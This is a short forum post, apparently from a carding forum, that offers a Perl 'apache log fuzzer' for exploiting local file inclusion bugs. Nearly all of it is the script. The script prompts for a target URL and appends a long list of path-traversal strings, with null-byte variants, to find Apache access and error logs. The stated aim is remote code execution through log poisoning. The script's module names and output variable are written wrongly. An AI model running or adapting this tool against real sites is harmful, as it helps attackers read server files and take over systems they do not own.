sometimes u find lfi bug (which is rare nowadays ...)
and u need to find the apache log files for code execution this tool comes in handy

code:
#!/usr/bin/perl

use http::request;
use lwp::useragent;
system ("cls");
print "\t\t/////////////////////////////////////////////////\n";
print "\t\t_____________________________________________ ____\n";
print "\t\t\t yakamoz apache log fuzzer ver.1.0\n";
print "\t\t\t coded by bl4ck.viper\n";
print "\t\t\t thanks from 2mzrp\n";
print "\t\t_____________________________________________ ____\n";
print "\n\n";
sleep (1);
print "\t\t\t\t welcome\n";
print "\n";
print "\n\n";
print "\t insert target (ex: http://www.site.com/index.php?page=)\n";
print "\t target :";
$host=<stdin>;
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };

print "\n\n";
print "\t\t*-*-*-*-*-* working in progress *-*-*-*-*-*\n";
print "\n\n";
@logs= ('../apache/logs/access.log ',
'../../apache/logs/access.log ',
'../../../apache/logs/access.log ',
'../../../../apache/logs/access.log ',
'../../../../../apache/logs/access.log ',
'../../../../../../apache/logs/access.log ',
'../../../../../../../apache/logs/access.log ',
'../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../../../../../../apache/logs/access.log ',
'../apache/logs/access.log%00',
'../../apache/logs/access.log%00',
'../../../apache/logs/access.log%00',
'../../../../apache/logs/access.log%00',
'../../../../../apache/logs/access.log%00',
'../../../../../../apache/logs/access.log%00',
'../../../../../../../apache/logs/access.log%00',
'../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../../../../../apache/logs/access.log%00',
'../../apache/logs/error.log ',
'../../../apache/logs/error.log ',
'../../../../apache/logs/error.log ',
'../../../../../apache/logs/error.log ',
'../../../../../../apache/logs/error.log ',
'../../../../../../../apache/logs/error.log ',
'../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../../../../../../apache/logs/error.log ',
'../../apache/logs/error.log%00',
'../../../apache/logs/error.log%00',
'../../../../apache/logs/error.log%00',
'../../../../../apache/logs/error.log%00',
'../../../../../../apache/logs/error.log%00',
'../../../../../../../apache/logs/error.log%00',
'../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../../../../../apache/logs/error.log%00',
'../etc/httpd/logs/acces_log ',
'../../etc/httpd/logs/acces_log ',
'../../../etc/httpd/logs/acces_log ',
'../../../../etc/httpd/logs/acces_log ',
'../../../../../etc/httpd/logs/acces_log ',
'../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../../../../../etc/httpd/logs/acces_log ',
'../etc/httpd/logs/acces_log%00',
'../../etc/httpd/logs/acces_log%00',
'../../../etc/httpd/logs/acces_log%00',
'../../../../etc/httpd/logs/acces_log%00',
'../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../etc/httpd/logs/error_log ',
'../../etc/httpd/logs/error_log ',
'../../../etc/httpd/logs/error_log ',
'../../../../etc/httpd/logs/error_log ',
'../../../../../etc/httpd/logs/error_log ',
'../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../../../../etc/httpd/logs/error_log ',
'../etc/httpd/logs/error_log%00',
'../../etc/httpd/logs/error_log%00',
'../../../etc/httpd/logs/error_log%00',
'../../../../etc/httpd/logs/error_log%00',
'../../../../../etc/httpd/logs/error_log%00',
'../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../usr/local/apache/logs/access_log ',
'../../usr/local/apache/logs/access_log ',
'../../../usr/local/apache/logs/access_log ',
'../../../../usr/local/apache/logs/access_log ',
'../../../../../usr/local/apache/logs/access_log ',
'../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../../../../../usr/local/apache/logs/access_log ',
'../usr/local/apache/logs/access_log%00',
'../../usr/local/apache/logs/access_log%00',
'../../../usr/local/apache/logs/access_log%00',
'../../../../usr/local/apache/logs/access_log%00',
'../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../usr/local/apache/logs/access.log ',
'../../usr/local/apache/logs/access.log ',
'../../../usr/local/apache/logs/access.log ',
'../../../../usr/local/apache/logs/access.log ',
'../../../../../usr/local/apache/logs/access.log ',
'../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../../../../../usr/local/apache/logs/access.log ',
'../usr/local/apache/logs/access.log%00',
'../../usr/local/apache/logs/access.log%00',
'../../../usr/local/apache/logs/access.log%00',
'../../../../usr/local/apache/logs/access.log%00',
'../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../etc/httpd/logs/access_log ',
'../../etc/httpd/logs/access_log ',
'../../../etc/httpd/logs/access_log ',
'../../../../etc/httpd/logs/access_log ',
'../../../../../etc/httpd/logs/access_log ',
'../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../../../../../etc/httpd/logs/access_log ',
'../etc/httpd/logs/access_log%00',
'../../etc/httpd/logs/access_log%00',
'../../../etc/httpd/logs/access_log%00',
'../../../../etc/httpd/logs/access_log%00',
'../../../../../etc/httpd/logs/access_log%00',
'../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../../../../../etc/httpd/logs/access_log%00',
'../etc/httpd/logs/error_log ',
'../../etc/httpd/logs/error_log ',
'../../../etc/httpd/logs/error_log ',
'../../../../etc/httpd/logs/error_log ',
'../../../../../etc/httpd/logs/error_log ',
'../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../etc/httpd/logs/error_log ',
'../etc/httpd/logs/error_log%00',
'../../etc/httpd/logs/error_log%00',
'../../../etc/httpd/logs/error_log%00',
'../../../../etc/httpd/logs/error_log%00',
'../../../../../etc/httpd/logs/error_log%00',
'../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../var/log/apache/access_log ',
'../../var/log/apache/access_log ',
'../../../var/log/apache/access_log ',
'../../../../var/log/apache/access_log ',
'../../../../../var/log/apache/access_log ',
'../../../../../../var/log/apache/access_log ',
'../../../../../../../var/log/apache/access_log ',
'../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../../../../../var/log/apache/access_log ',
'../var/log/apache/access_log%00',
'../../var/log/apache/access_log%00',
'../../../var/log/apache/access_log%00',
'../../../../var/log/apache/access_log%00',
'../../../../../var/log/apache/access_log%00',
'../../../../../../var/log/apache/access_log%00',
'../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../../../../var/log/apache/access_log%00');

foreach $scan(@logs){

$url = $host.$scan;
$request = http::request->new(get=>$url);
$useragent = lwp::useragent->new();

$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /apache/) { $msg = vulnerability;}
else { $msg = "not found";}
print "$scan..........[$msg]\n";
}


read more: http://cardingmafia.ws/f25/lfi-log-f...#ixzz3ztioemln